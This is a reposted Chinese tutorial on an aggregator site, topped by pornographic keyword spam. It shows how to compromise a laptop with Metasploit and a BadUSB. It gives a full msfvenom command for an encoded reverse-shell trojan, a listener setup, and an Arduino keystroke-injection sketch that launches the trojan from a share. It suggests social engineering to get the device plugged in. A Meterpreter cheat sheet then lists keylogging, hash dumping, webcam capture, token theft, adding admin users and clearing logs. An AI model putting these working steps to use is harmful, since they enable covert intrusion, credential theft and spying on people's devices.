日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

基于msf与badusb的笔记本电脑渗透测试(详解)

發布時間:2023/12/20 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 基于msf与badusb的笔记本电脑渗透测试(详解) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

  • 1. msf部分
    • 1.1 生成木馬文件
    • 1.2 配置監聽環境
  • 2. Badusb部分
    • 2.1 收集數據
    • 2.2 編寫腳本并上傳
  • 3. 配置局域網環境
    • 3.1 創建局域網環境
    • 3.2 設置共享文件夾
  • 4. 開始攻擊
    • 4.1 開始監聽
    • 4.2 近源滲透
    • 4.3 完成攻擊

所需工具:windows10主機,windows10靶機,kali 2020.01虛擬機,Badusb(這里我用的是Arduino Micro的板子),EP-N8508GS無線網卡

1. msf部分

1.1 生成木馬文件

首先利用kali中的msf生成木馬文件
注:這里用的是最簡單的方法。木馬非免殺,若需深入,可以參考Metasploit 整理筆記

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.42.54 LPORT=50050 -f exe > door.exe

其中:

  • -p:產生一個payload;
  • windows/meterpreter/reverse_tcp:是指windows下的一個tcp漏洞;
  • -e x86/shikata_ga_nai:這是編碼方式;
  • -i 5:編碼次數;
  • -b ‘\x00’:避免運行時會出現的值;
  • LHOST:kali虛擬機的IP(通過ifconfig查找);
  • LPORT:填寫自己的端口;
  • -f exe:生成.exe的可執行文件;
  • door.exe:文件名.exe。

1.2 配置監聽環境

msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST xxx.xxx.xxx.xxx set LPORT xxxxx show options exploit
  • msfconsole 是打開msf的指令(如下圖)

  • LHOST和LPORT還是填之前木馬文件中的IP和端口號(如下)

2. Badusb部分

2.1 收集數據

由于只是一次滲透測試,所以我只是將木馬放在了主機的共享文件夾中。因此只需收集主機的IP地址即可(通過ipconfig查找)。

2.2 編寫腳本并上傳

根據之前收集到的信息,我們可以在Arduino IDE中進行腳本的編寫(在Microsoft Storek中可免費下載):

#include <Keyboard.h>void setup() {Keyboard.begin();delay(500);Keyboard.press(KEY_LEFT_GUI);delay(300);Keyboard.press('r');delay(500);Keyboard.press(KEY_LEFT_SHIFT);Keyboard.releaseAll();Keyboard.println("cmd");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);delay(750);Keyboard.press(KEY_LEFT_SHIFT);Keyboard.release(KEY_LEFT_SHIFT);Keyboard.println("start \\\\xxx.xxx.xxx.xxx\\share\\door.exe");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);delay(2000);Keyboard.println("exit");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);Keyboard.end();}void loop() { }
  • Keyboard.begin() 開始;
  • Keyboard.press() 按下按鍵;
  • Keyboard.release() 松開按鍵;
    注:Keyboard.press()與Keyboard.release()必須成對出現!
  • Keyboard.print() 輸入文本;
  • Keyboard.println() 輸入文本并回車;
  • Keyboard.releaseAll() 釋放所有按鍵;
  • Keyboard.end() 結束;
  • delay() 延時(單位為毫秒)。
    驗證通過后開始上傳

    注意:腳本上傳后會在電腦上運行一遍,注意使用文本編輯器吸收按鍵。
常用按鍵表
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12

3. 配置局域網環境

3.1 創建局域網環境

我們使用WIFI搭建局域網,由于虛擬機沒有內設無線網卡,所以需要外接無線網卡。這里我選用的是EP-N8508GS無線網卡(之前玩無線的時候買的,具有偵聽功能)。

3.2 設置共享文件夾

將木馬文件放入一個空的文件夾中,并將其配置為共享文件夾:

4. 開始攻擊

4.1 開始監聽

在kali上的msf中鍵入exploit開始監聽

4.2 近源滲透

將Badusb插入靶機中(實戰中可以通過社工的方法),等待其開始木馬。
注:不同機型可能會出現不同情況,可視情況修改Arduino腳本

4.3 完成攻擊


當出現如上顯示時,就意味著靶機已在你的掌控之下,之后便可通過指令對其進行操控:

help查看幫助
run scriptname運行腳本
sysinfo系統基本信息
ls列目錄
use priv運行提權組件
ps列進程
migrate PIDPID 遷移
use incognito token竊取
list_tokens -u查看可用用戶token
list_tokens -g查看可用組token
impersonate_token DOMAIN_NAME\USERNAME模仿token
steal_token PID竊取PID 所屬token 并模仿
drop_token停止模仿token
getsystem獲取SYSTEM 權限
shell運行shell
execute -f cmd.exe -i交互式運行cmd
execute -f cmd.exe -i -t使用可用token 運行
execute -f cmd.exe -i -H -t同上,同時隱藏進程
rev2self返回至初始用戶
reg command修改注冊表
setkesktop number切換至另一已登錄用戶屏幕
screenshot截屏
upload file上傳文件
download file下載文件
keyscan_start開始截取擊鍵記錄
keyscan_stop停止截取擊鍵記錄
getprivs盡可能提升權限
uictl disable/enable keyboard/mouse獲取鍵盤或鼠標的控制權
background將當前meterpreter shell 轉入后臺
hashdump導出所有用戶hash
use sniffer加載嗅探模塊
sniffer_interfaces查看可用網卡接口
sniffer_dump interfaceID pcapname開始嗅探
sniffer_start interfaceID packet-buffer指定buffer 范圍嗅探
sniffer_stats interfaceID抓取統計信息
sniffer_stop interfaceID停止嗅探
add_user username password -h ip添加用戶
add_group_user “Domain Admins” username -h ip添加用戶至管理組
clearev清空日志
timestomp改變文件屬性如創建時間等
reboot重啟
webcam_list查看攝像頭
webcam_snap通過攝像頭拍照
webcam_stream通過攝像頭開啟視頻

總結

以上是生活随笔為你收集整理的基于msf与badusb的笔记本电脑渗透测试(详解)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。